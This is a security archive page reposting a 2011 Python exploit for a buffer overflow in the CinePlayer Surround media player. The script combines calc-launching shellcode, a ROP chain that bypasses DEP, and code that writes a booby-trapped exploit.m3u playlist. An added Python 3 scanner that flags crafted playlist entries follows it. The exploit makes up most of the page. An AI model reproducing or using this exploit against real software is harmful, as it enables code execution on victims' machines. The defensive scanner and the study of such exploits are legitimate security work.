CinePlayer Surround Universal DEP Bypass Exploit
Source: Angel-Injection@hotmail.com Author: Angel Published: 2011-09-08
#!/usr/bin/python
#Exploit Title: CinePlayer Surround Universal DEP Bypass Exploit
#Author: Angel Injection
#Thanks To Inj3ct0r Team
#Home: http://1337day.com , http://sec-krb.org

shellcode = ("\xdd\xc3\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x32\xb8\x08\x99"
"\xc4\xb4\x31\x43\x17\x03\x43\x17\x83\xcb\x9d\x26\x41\x37"
"\x75\x2f\xaa\xc7\x86\x50\x22\x22\xb7\x42\x50\x27\xea\x52"
"\x12\x65\x07\x18\x76\x9d\x9c\x6c\x5f\x92\x15\xda\xb9\x9d"
"\xa6\xea\x05\x71\x64\x6c\xfa\x8b\xb9\x4e\xc3\x44\xcc\x8f"  # Shellcode WinExec "Calc.exe"
"\x04\xb8\x3f\xdd\xdd\xb7\x92\xf2\x6a\x85\x2e\xf2\xbc\x82"  # BadChars "\x0c\x0b\x0e"
"\x0f\x8c\xb9\x54\xfb\x26\xc3\x84\x54\x3c\x8b\x3c\xde\x1a"
"\x2c\x3d\x33\x79\x10\x74\x38\x4a\xe2\x87\xe8\x82\x0b\xb6"
"\xd4\x49\x32\x77\xd9\x90\x72\xbf\x02\xe7\x88\xbc\xbf\xf0"
"\x4a\xbf\x1b\x74\x4f\x67\xef\x2e\xab\x96\x3c\xa8\x38\x94"
"\x89\xbe\x67\xb8\x0c\x12\x1c\xc4\x85\x95\xf3\x4d\xdd\xb1"
"\xd7\x16\x85\xd8\x4e\xf2\x68\xe4\x91\x5a\xd4\x40\xd9\x48"
"\x01\xf2\x80\x06\xd4\x76\xbf\x6f\xd6\x88\xc0\xdf\xbf\xb9"
"\x4b\xb0\xb8\x45\x9e\xf5\x37\x0c\x83\x5f\xd0\xc9\x51\xe2"
"\xbd\xe9\x8f\x20\xb8\x69\x3a\xd8\x3f\x71\x4f\xdd\x04\x35"
"\xa3\xaf\x15\xd0\xc3\x1c\x15\xf1\xa7\xc3\x85\x99\x27")
#######################ROP START HERE#######################################
rop = pack('<L',0x5f367e8d3)
rop += pack('<L',0x013e6452)
rop += pack('<L',0x0047855b)
rop += pack('<L',0x00494277)
rop += pack('<L',0x00CA2108)
rop += pack('<L',0x10007584)
rop += pack('<L',0x00493b99)
rop += pack('<L',0x103c7de9)
rop += pack('<L',0x04e6fed7)
rop += pack('<L',0x00453cc7)
rop += pack('<L',0x100081cd)
rop += pack('<L',0x00493b98)
rop += pack('<L',0x000000db)
rop += pack('<L',0x004b0609)
rop += pack('<L',0x00000030)
rop += pack('<L',0x00645efd)
rop += ("A" * 40)
rop += pack('<L',0x00463BE9) # JMP to Shellcode
############################################################################
buf = ("\x90" * 20)
buf += shellcode
buf += ("A" * (3400-len(buf)))
buf += rop
buf += (
"\x40"
"\x7A\x30"
"\x45\xBE\x40\x15"
"\x40"
"\x8B\xEE"
"\x2B\xC8"
"\x5D\xD3"
"\x31"
"\xED\x11\x02\x31\xCD\x00"
"\xDC\x5D")
 
print "\t\t Exploit Creating"
sleep(1)
try:
    f = open("exploit.m3u","wb")
    f.write(buf)
    f.close()
    print "\t\t[+]File \"exploit.m3u\" Created Successfully."
    sleep(1)
except IOError,e:
    print "\t\t[+]Error: "+str(e)
    exit(-1) 
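
A defensive counterpart to the script above, added here and not part of the original posting: the file it writes is a single .m3u entry of more than 3400 bytes made of repeated filler followed by raw binary values, so a triage check over playlist files can flag that shape before a player opens it. The example is Python 3; the thresholds, the function names and both sample inputs are assumptions constructed for this example.

```python
import re

MAX_ENTRY_LEN = 1024   # assumed ceiling for a legitimate path or URL entry
MAX_RUN = 64           # assumed ceiling for one byte value repeated back to back
# One byte followed by MAX_RUN or more copies of itself, i.e. a run longer than MAX_RUN.
RUN_RE = re.compile(rb"(.)\1{%d,}" % MAX_RUN, re.DOTALL)
# Control bytes that have no place in a text playlist line (tab is allowed).
CONTROL_RE = re.compile(rb"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")


def check_entry(entry: bytes) -> list:
    """Return the reasons one playlist line looks like crafted input."""
    reasons = []
    if len(entry) > MAX_ENTRY_LEN:
        reasons.append("oversized")
    if RUN_RE.search(entry):
        reasons.append("byte-run")
    if CONTROL_RE.search(entry):
        reasons.append("control-bytes")
    return reasons


def scan_playlist(data: bytes) -> list:
    """Scan raw .m3u bytes; return (line_number, reasons) for suspicious lines.

    Directive lines (#EXTM3U, #EXTINF) are checked too, since a player
    parses them as well as the path entries.
    """
    findings = []
    for number, line in enumerate(data.splitlines(), start=1):
        entry = line.strip()
        if not entry:
            continue
        reasons = check_entry(entry)
        if reasons:
            findings.append((number, reasons))
    return findings


# Constructed sample: an ordinary playlist.
BENIGN = (b"#EXTM3U\r\n#EXTINF:215,Artist - Title\r\n"
          b"C:\\Music\\track01.mp3\r\nhttp://media.example/stream.mp3\r\n")
# Constructed sample with the same shape as the file written above: filler to
# 3400 bytes, then a little-endian 32-bit placeholder value (not a real address).
CRAFTED = b"\x90" * 20 + b"A" * 3380 + (0x00112233).to_bytes(4, "little")

if __name__ == "__main__":
    print(scan_playlist(BENIGN))
    print(scan_playlist(CRAFTED))
```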

 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved